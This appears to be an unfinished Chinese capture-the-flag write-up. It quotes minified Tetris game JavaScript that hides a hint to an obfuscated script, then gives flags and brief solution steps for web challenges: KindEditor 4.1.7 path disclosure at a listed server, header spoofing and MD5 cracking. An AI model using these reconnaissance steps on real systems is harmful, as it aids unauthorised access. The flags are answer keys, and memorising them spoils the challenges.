this.actions;
this.el = {
level: document.getElementById("tetris-stats-level"),
time: document.getElementById("tetris-stats-time"),
apm: document.getElementById("tetris-stats-apm"),
lines: document.getElementById("tetris-stats-lines"),
score: document.getElementById("tetris-stats-score")
};
this.timerId = null;
var b = this;
this.start = function() {
this.reset();
this.timerId = setInterval(this.incTime, 1E3)
};
this.stop = function() {
this.timerId && clearInterval(this.timerId)
};
this.reset = function() {
this.stop();
this.level = 1;
this.actions = this.puzzles = this.score = this.lines = this.apm = this.time = 0;
this.el.level.innerHTML = this.level;
this.el.time.innerHTML = this.time;
this.el.apm.innerHTML = this.apm;
this.el.lines.innerHTML = this.lines;
this.el.score.innerHTML = this.score
};
this.incTime = function() {
b.time++;
b.el.time.innerHTML = b.time;
b.apm = parseInt(b.actions / b.time * 60);
b.el.apm.innerHTML = b.apm
};
this.setScore = function(b) {
this.score = b;
this.el.score.innerHTML = this.score
};
this.setLevel = function(b) {
this.level = b;
this.el.level.innerHTML = this.level
};
this.setLines = function(b) {
this.lines = b;
this.el.lines.innerHTML = this.lines
};
this.setPuzzles = function(b) {
this.puzzles = b
};
this.setActions = function(b) {
this.actions = b
};
this.getScore = function() {
return this.score
};
this.getLevel = function() {
return this.level
};
this.getLines = function() {
return this.lines
};
this.getPuzzles = function() {
return this.puzzles
};
this.getActions = function() {
return this.actions
}
};
this.area = this.puzzle = null;
this.areaY = this.areaX = this.unit = 20;
this.highscores = new function(b) {
function d(a, b) {
this.name = a;
this.score = b
}
this.maxscores = b;
this.scores = [];
this.load = function() {
var a = (new p).get("tetris-highscores");
this.scores = [];
if (a.length) for (var a = a.split("|"), b = 0; b < a.length; ++b) {
var e = a[b].split(":");
this.scores.push(new d(e[0], Number(e[1])))
}
};
this.save = function() {
for (var a = new p, b = [], d = 0; d < this.scores.length; ++d) b.push(this.scores[d].name + ":" + this.scores[d].score);
b = b.join("|");
a.set("tetris-highscores", b, 864E5)
};
this.mayAdd = function(a) {
if (this.scores.length < this.maxscores) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
for (var b = this.scores.length - 1; 0 <= b; --b) if (this.scores[b].score < a) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
return !1
};
this.add = function(a, b) {
a = a.replace(/[;=:|]/g, "?");
a = a.replace(/</g, "<").replace(/>/g, ">");
if (this.scores.length < this.maxscores) this.scores.push(new d(a, b));
else for (var e = this.scores.length - 1; 0 <= e; --e) if (this.scores[e].score < b) {
this.scores.removeByIndex(e);
this.scores.push(new d(a, b));
break
}
this.sort();
this.save()
};
this.getScores = function() {
return this.scores
};
this.toHtml = function() {
for (var a = '<table\tcellspacing="0"\tcellpadding="2"><tr><th></th><th>Name</th><th>Score</th></tr>', b = 0; b < this.scores.length; ++b) a += "<tr><td>?.</td><td>?</td><td>?</td></tr>".format(b + 1, this.scores[b].name, this.scores[b].score);
return a + "</table>"
};
this.sort = function() {
var a = this.scores,
b = a.length;
this.scores = [];
for (var d = 0; d < b; ++d) {
for (var e = null, g = null, f = 0; f < a.length; ++f) if (!e || a[f].score > e.score) e = a[f], g = f;
a.removeByIndex(g);
this.scores.push(e)
}
};
this.load()
}(10);
this.start = function() {
b.reset();
b.stats.start();
document.getElementById("tetris-nextpuzzle").style.display = "block";
document.getElementById("tetris-keys").style.display = "none";
b.area = new l(b.unit, b.areaX, b.areaY, "tetris-area");
b.puzzle = new k(b, b.area);
b.puzzle.mayPlace() ? b.puzzle.place() : b.gameOver()
};
this.reset = function() {
b.puzzle && (b.puzzle.destroy(), b.puzzle = null);
b.area && (b.area.destroy(), b.area = null);
document.getElementById("tetris-gameover").style.display = "none";
document.getElementById("tetris-nextpuzzle").style.display = "none";
document.getElementById("tetris-keys").style.display = "block";
b.stats.reset()
};
this.gameOver = function() {
b.stats.stop();
b.puzzle.stop();
document.getElementById("tetris-nextpuzzle").style.display = "none";
document.getElementById("tetris-gameover").style.display = "block";
if (this.highscores.mayAdd(this.stats.getScore())) {
var e = prompt("Game Over !\nEnter your name:", "");
e && e.trim().length && this.highscores.add(e, this.stats.getScore())
}
};
this.up = function() {
b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayRotate() && (b.puzzle.rotate(), b.stats.setActions(b.stats.getActions() + 1))
};
this.down = function() {
b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveDown() && (b.stats.setScore(b.stats.getScore() + 5 + b.stats.getLevel()), b.puzzle.moveDown(), b.stats.setActions(b.stats.getActions() + 1))
};
this.left = function() {
b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveLeft() && (b.puzzle.moveLeft(), b.stats.setActions(b.stats.getActions() + 1))
};
this.right = function() {
b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveRight() && (b.puzzle.moveRight(), b.stats.setActions(b.stats.getActions() + 1))
};
this.space = function() {
b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && (b.puzzle.stop(), b.puzzle.forceMoveDown())
};
var m = new f("tetris-help"),
n = new f("tetris-highscores");
document.getElementById("tetris-menu-start").onclick = function() {
m.close();
n.close();
b.start();
this.blur()
};
document.getElementById("tetris-menu-reset").onclick = function() {
m.close();
n.close();
b.reset();
this.blur()
};
document.getElementById("tetris-menu-help").onclick = function() {
n.close();
m.activate();
this.blur()
};
document.getElementById("tetris-help-close").onclick = m.close;
document.getElementById("tetris-menu-highscores").onclick = function() {
m.close();
document.getElementById("tetris-highscores-content").innerHTML = b.highscores.toHtml();
n.activate();
this.blur()
};
document.getElementById("tetris-highscores-close").onclick = n.close;
var e = new function() {
this.up = 38;
this.down = 40;
this.left = 37;
this.right = 39;
this.n = 78;
this.r = 82;
this.space = 32;
this.f12 = 123;
this.escape = 27;
this.keys = [];
this.funcs = [];
var b = this;
this.set = function(b, a) {
this.keys.push(b);
this.funcs.push(a)
};
this.event = function(d) {
d || (d = window.event);
for (var a = 0; a < b.keys.length; a++) if (d.keyCode == b.keys[a]) b.funcs[a]()
}
};
e.set(e.n, this.start);
e.set(e.r, this.reset);
e.set(e.up, this.up);
e.set(e.down, this.down);
e.set(e.left, this.left);
e.set(e.right, this.right);
e.set(e.space, this.space);
document.onkeydown = e.event
}
String.prototype.trim || (String.prototype.trim = function() {
return this.replace(/^\s*|\s*$/g, "")
});
Array.prototype.removeByIndex || (Array.prototype.removeByIndex = function(f) {
this.splice(f, 1)
});
String.prototype.format || (String.prototype.format = function() {
if (!arguments.length) throw "String.format()\tfailed,\tno arguments passed, this =\t" + this;
var f = this.split("?");
if (arguments.length != f.length - 1) throw "String.format() failed, tokens !=\targuments, this\t= " + this;
for (var l = f[0], k = 0; k < arguments.length; ++k) l += arguments[k] + f[k + 1];
return l
});
貼出關鍵代碼
this.mayAdd = function(a) {
if (this.scores.length < this.maxscores) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
for (var b = this.scores.length - 1; 0 <= b; --b) if (this.scores[b].score < a) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
return !1
};“webqwer” [1] + “100.js”爲e100.js
訪問,爲jsfuck混淆過的js代碼。直接控制檯運行
flag{oT0yTrjU0xhjhj2YTcT8jljMWpzS9tDk}
Reappear
思路
在http://218.76.35.75:65180//kindeditor/kindeditor.js泄露的信息可看出版本爲4.1.7
這個版本有個泄露路徑的js腳本爲:/php/file_manager_json.php
直接訪問
根據泄露的信息訪問/attached/flag_clue.php
得到=0nYvpEdhVmcnFUZu9GRlZXd7pzZhxmZ
直接反序+base64解碼獲得flag
DrinkCoffee
思路
抓包,根據提示修改Ip以及referer看下響應包,有個d2626f412da748e711ca4f4ae9428664 md5解密爲cafe
將cafe帶入包中Resend一次,得到flag
Document
思路
暫時寫到這,七點繼續寫。